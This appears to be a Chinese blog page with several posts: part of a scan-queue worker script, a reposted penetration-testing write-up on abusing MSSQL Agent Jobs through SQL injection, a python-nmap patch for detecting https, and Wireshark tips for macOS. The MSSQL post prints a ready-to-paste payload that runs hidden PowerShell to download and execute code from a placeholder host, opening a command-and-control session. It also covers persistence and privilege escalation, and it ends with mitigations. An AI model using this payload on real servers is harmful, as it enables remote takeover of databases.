    scann(task['target'])
    task_done = False
    time.sleep(1)
    step = 0
    last_vuln_len = 0
    sv = server
    scan = sess.query(Scan).filter_by(id=task['scan_id']).first()
    # tell gateway server that the task is loaded on this instance
    scan.run_instance = server
    while True:
        # update scan status; check if freed
        list_scans = json.loads(requests.get(sv + '/scans/').text)['items'] # currently just 1
        if (len(list_scans) == 0): # freed
            break
        currentpath = list_scans[0]['href']
        # update vuln list
        r = requests.get(sv + currentpath + '/kb/')
        items = json.loads(r.text)['items'] 
        for i in xrange(last_vuln_len, len(items)):
            v = Vulnerability(i+1, requests.get(sv + items[i]['href']).text, task['scan_id'])
            sess.add(v)
            sess.commit()
            scan.num_vulns += 1
        last_vuln_len = len(items)
        scan.status = list_scans[0]['status']
        sess.commit()
        if scan.status == 'Stopped' and not task_done:
            task_done = True
            requests.delete(sv + currentpath)
        step += 1
        if step == 9:
            con.process_data_events() # MQ heartbeat
            step = 0
        time.sleep(5) # avoid over consumption
    # TODO: send mails to list when the scan is stopped or completed
    print 'DOne'
    ch.basic_ack(delivery_tag=method.delivery_tag)
#print getServerStatus(server)


channelTask.basic_qos(prefetch_count=1)
channelTask.basic_consume(callback, queue='task')

print '[*] Waiting for message'

channelTask.start_consuming()

 

MSSQL Agent Jobs for Command Execution

发布时间:October 7, 2016 // 分类:运维工作,工作日志,linux,windows // No Comments

The primary purpose of the Optiv attack and penetration testing (A&P) team is to simulate adversarial threat activity in an effort to test the efficacy of defensive security controls. Testing is meant to assess many facets of organizational security programs by using real-world attack scenarios. This type of assessment helps identify areas of strength, or areas of improvement regarding organizations' IT security processes, personnel and systems.

There exists a cat-and-mouse game in IT security, a never-ending arms race. Malicious actors implement new attacks; defensive controls are deployed to detect and deter those same attacks. It behooves organizations to attempt to be proactive in their defensive posture, and identify new methods of attack and preemptively put controls in place to stop them. Optiv A&P strives to maintain technical expertise in both the offensive and attack arena, along with the defensive methods used to detect and prevent attacks. To stay relevant and effective in this ever-changing threat landscape, it is paramount that organizations that specialize in assessing organizational security posture stay relevant to the tactics, techniques and procedures (TTPs) that are used by genuine threat actors. Optiv engages in proactive threat research to identify TTPs that could be used by threat actors to compromise systems or data.

Attacks that Stay Below the Radar

A goal of many attackers is to implement campaigns that go undetected. The longer an organization is unware of a breach condition, the more time an attacker has to identify and exfiltrate sensitive information, and use the compromised environment as a pivot point for more nefarious activity.

Optiv A&P implements advanced attacks in an effort to identify gaps in detective capabilities, and assist organizations in detecting the attacks.

A recent example of this activity is abusing native functionality with Microsoft SQL Server (MSSQL) to gain command and control of database servers using MSSQL Server Agent Jobs. 

Microsoft SQL Server Agent

The MSSQL Server Agent is a windows service that can be used to perform automated tasks. The agent jobs can be scheduled, and run under the context of the MSSQL Server Agent service. However, using agent proxy capabilities, the jobs can be run with different credentials as well. 

The Attack

During a recent engagement, a SQL injection condition was identified in a web application that was using MSSQL Server 2012. At the request of the client, Optiv performed the assessment in a surreptitious manner, making every effort to avoid detection. Optiv devised a way to take advantage of native MSSQL Server functionality to execute commands on the underlying Windows operating system. Also, the xp_cmdshell stored procedure had been disabled, and the ability to create custom stored procedures had also been limited.

Many monitoring or detection systems generate alerts when a commonly abused MSSQL stored procedure (xp_cmdshell) is used during an attack. The usage of xp_cmdshell by  attackers, and penetration testers has caused many organizations to disable it, limit its ability to be used and tune alerting systems to watch for it.

Optiv identified a scenario wherein the MSSQL Server Agent could be leveraged to gain command execution on target database server. However, the server had to meet several conditions:

  • The MSSQL Server Agent service needs to be running.
  • The account that is being used must have permissions to create and execute agent jobs (in this case the database account that was running the service that had a SQL injection condition). 

Optiv identified two MSSQL Agent Job subsystems that could be advantageous to attackers: the CmdExec and PowerShell subsystems. These two features can execute operating systems commands, and PowerShell respectively.

Optiv used the SQL injection entry point to create and execute the agent job. The job's command was PowerShell code that created a connection to an Optiv controlled IP address and downloaded additional PowerShell instructions that established an interactive command and control session between the database server, and the Optiv controlled server.

Here is the SQL syntax breakdown. Note, in the below download-string command, the URI is between two single quotes, not double quotes. This is to escape single quotes within SQL.

USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1' ; EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://IP_OR_HOSTNAME/file''))"', @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; EXEC dbo.sp_start_job N'test_powershell_job1';

The above string is for easier copying and pasting, if you want to recreate this attack scenario.

The below quickly shows a demo on how to weaponize this attack.

The SQL syntax is URL encoded. In this specific instance the attack is being sent via an HTTP GET request, hence the necessity to URL encode the payload.

The request, with the SQL injection payload, to an HTTP GET parameter that is vulnerable to SQL injection is shown. Note the %20 (space character) added to the beginning of the payload.

Once the payload is run we can see a command and control session is established, running with the SQLSERVERAGENT account's privileges.

On the victim SQL server we can see the SQL Agent job has been created.

The below video demonstrates the full attack.

Attack Post Mortem

This attack can be leveraged to run MSSQL Server Agent jobs on other MSSQL servers, if the Agent service on the victim is configured to use an account with permissions to other MSSQL servers. Also, Agent jobs can be scheduled, and may be used as an evasive means to maintain a persistent connection to victim MSSQL servers.

In some instances, if the MSSQL Server Agent service is configured with an account that has more privileges than that of the database user, for example an Active Directory domain service account, this attack can be used by an attacker to escalate their privileges. 

Mitigation

General web application hygiene should be used to prevent attack vectors like SQL injection. Use prepared statements in SQL queries within web applications, and abstracting application logic from backend databases. Employ web application firewalls to detect and block attacks on applications.

Internal systems that do not need to communicate directly with Internet hosts should be disallowed from doing so. This can prevent command and control channels from being established between internal assets, and attacker controlled endpoints. Employ strict network egress filtering.

MSSQL Server Agent jobs can be abused by any attacker that has the ability to execute SQL queries on a database server. To specifically limit the attack surface of MSSQL Server Agent jobs ensure that databases are running under the context of user accounts with the concept of least privilege. If the account that a database is running under does not have permissions to create and start MSSQL Server Agent jobs this attack is negated. Also, if the MSSQL Server Agent service is not in use it should be disabled. 

使用python-nmap不出https踩到的坑

发布时间:September 1, 2016 // 分类:工作日志,运维工作,开发笔记,linux,python,windows,生活琐事 // No Comments

今天在使用python-nmap来进行扫描入库的时候发现https端口硬生生的给判断成了http

仔细测试了好几次都是这样子。后来果断的不服气,仔细看了下扫描的参数。发现python-nmap调用的时候会强制加上-ox -这个参数

正常扫描是

nmap 45.33.49.119 -p T:443 -Pn -sV --script=banner

然而经过python-nmap以后就是

nmap -oX - 45.33.49.119 -p T:443 -Pn -sV --script=banner
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/local/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.12 scan initiated Thu Sep  1 00:02:07 2016 as: nmap -oX - -p T:443 -Pn -sV -&#45;script=banner 45.33.49.119 -->
<nmaprun scanner="nmap" args="nmap -oX - -p T:443 -Pn -sV -&#45;script=banner 45.33.49.119" start="1472659327" startstr="Thu Sep  1 00:02:07 2016" version="7.12" xmloutputversion="1.04">
<scaninfo type="connect" protocol="tcp" numservices="1" services="443"/>
<verbose level="0"/>
<debugging level="0"/>
<host starttime="1472659328" endtime="1472659364"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="45.33.49.119" addrtype="ipv4"/>
<hostnames>
<hostname name="ack.nmap.org" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="443"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="Apache httpd" version="2.4.6" extrainfo="(CentOS)" tunnel="ssl" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.6</cpe></service><script id="http-server-header" output="Apache/2.4.6 (CentOS)"><elem>Apache/2.4.6 (CentOS)</elem>
</script></port>
</ports>
<times srtt="191238" rttvar="191238" to="956190"/>
</host>
<runstats><finished time="1472659364" timestr="Thu Sep  1 00:02:44 2016" elapsed="36.65" summary="Nmap done at Thu Sep  1 00:02:44 2016; 1 IP address (1 host up) scanned in 36.65 seconds" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

经过格式化以后看到的内容是

其中的一个参数tunnel.但是看了下https://bitbucket.org/xael/python-nmap/raw/8ed37a2ac20d6ef26ead60d36f739f4679fcdc3e/nmap/nmap.py这里的内容。发现没有与之关联的。

for dport in dhost.findall('ports/port'):
                # protocol
                proto = dport.get('protocol')
                # port number converted as integer
                port =  int(dport.get('portid'))
                # state of the port
                state = dport.find('state').get('state')
                # reason
                reason = dport.find('state').get('reason')
                # name, product, version, extra info and conf if any
                name = product = version = extrainfo = conf = cpe = ''
                for dname in dport.findall('service'):
                    name = dname.get('name')
                    if dname.get('product'):
                        product = dname.get('product')
                    if dname.get('version'):
                        version = dname.get('version')
                    if dname.get('extrainfo'):
                        extrainfo = dname.get('extrainfo')
                    if dname.get('conf'):
                        conf = dname.get('conf')

                    for dcpe in dname.findall('cpe'):
                        cpe = dcpe.text
                # store everything
                if not proto in list(scan_result['scan'][host].keys()):
                    scan_result['scan'][host][proto] = {}

                scan_result['scan'][host][proto][port] = {'state': state,
                                                          'reason': reason,
                                                          'name': name,
                                                          'product': product,
                                                          'version': version,
                                                          'extrainfo': extrainfo,
                                                          'conf': conf,
                                                          'cpe': cpe}

试想下如果把name以及tunnel取出来同时匹配不就好了。于是对此进行修改。410-440行

                name = product = version = extrainfo = conf = cpe = tunnel =''
                for dname in dport.findall('service'):
                    name = dname.get('name')
                    if dname.get('product'):
                        product = dname.get('product')
                    if dname.get('version'):
                        version = dname.get('version')
                    if dname.get('extrainfo'):
                        extrainfo = dname.get('extrainfo')
                    if dname.get('conf'):
                        conf = dname.get('conf')
                    if dname.get('tunnel'):
                        tunnel = dname.get('tunnel')

                    for dcpe in dname.findall('cpe'):
                        cpe = dcpe.text
                # store everything
                if not proto in list(scan_result['scan'][host].keys()):
                    scan_result['scan'][host][proto] = {}

                scan_result['scan'][host][proto][port] = {'state': state,
                                                          'reason': reason,
                                                          'name': name,
                                                          'product': product,
                                                          'version': version,
                                                          'extrainfo': extrainfo,
                                                          'conf': conf,
                                                          'tunnel':tunnel,
                                                          'cpe': cpe}

还有在654-670行里面增加我们添加的tunnel

        csv_ouput = csv.writer(fd, delimiter=';')
        csv_header = [
            'host',
            'hostname',
            'hostname_type',
            'protocol',
            'port',
            'name',
            'state',
            'product',
            'extrainfo',
            'reason',
            'version',
            'conf',
            'tunnel',
            'cpe'
            ]

然后我们import这个文件。在获取的内容里面进行判断.如果namehttp的同时tunnelssl,则判断为https

        for targetHost in scanner.all_hosts():
            if scanner[targetHost].state() == 'up' and scanner[targetHost]['tcp']:
                for targetport in scanner[targetHost]['tcp']:
                    #print(scanner[targetHost]['tcp'][int(targetport)])
                    if scanner[targetHost]['tcp'][int(targetport)]['state'] == 'open' and scanner[targetHost]['tcp'][int(targetport)]['product']!='tcpwrapped':
                        if scanner[targetHost]['tcp'][int(targetport)]['name']=='http' and scanner[targetHost]['tcp'][int(targetport)]['tunnel'] == 'ssl':
                            scanner[targetHost]['tcp'][int(targetport)]['name'] = 'https'
                        else:
                            scanner[targetHost]['tcp'][int(targetport)]['name'] = scanner[targetHost]['tcp'][int(targetport)]['name']
                        print(domain+'\t'+targetHosts+'\t'+str(targetport) + '\t' + scanner[targetHost]['tcp'][int(targetport)]['name'] + '\t' + scanner[targetHost]['tcp'][int(targetport)]['product']+scanner[targetHost]['tcp'][int(targetport)]['version'])
                        #if scanner[targetHost]['tcp'][int(targetport)]['name'] in ["https","http"]:

改造后的文件扫描结果

Mac OS中 wireshark找不到网卡的解决办法

发布时间:August 17, 2016 // 分类:工作日志,运维工作,linux,转帖文章 // No Comments

1、WireShark依赖X11;
2、默认情况下Mac OS X是不安装X11的;
因此,在Mac上安装WireShark,首先找出Mac OS 安装DVD安装X11。
安装完以后 echo $DISPLAY看看是不是出现如下结果
:0.0
如果没有,请执行如下命令行:
DISPLAY=:0.0; export DISPLAY
另外,由于Mac OS的bug问题,每次重启系统以后,都要运行这两个命令是WireShark寻找到网卡:
sudo chgrp admin /dev/bpf*
sudo chmod g+rw /dev/bpf*
另一个办法可能不成功,就是将WireShark安装文件中的ChmodBPF文件夹拷贝到/Library/StartupItems/中;我的机器老是报安全性设置问题,因此暂时只能每次手动修改了;但如果不抓包,只是用来解码的话不用修改bpf权限也可以;
WireShark启动故障排除:
到/Application/WireShark.app/Contents/MacOS 下执行WireShark,查看结果,依据提示进行处理;

分类
最新文章
最近回复
  • 轨迹: niubility!
  • 没穿底裤: 好办法..
  • emma: 任务计划那有点小问题,调用后Activation.exe不是当前活动窗口,造成回车下一步下一步...
  • 没穿底裤: hook execve函数
  • tuhao lam: 大佬,还有持续跟进Linux命令执行记录这块吗?通过内核拦截exec系统调用的方式,目前有没有...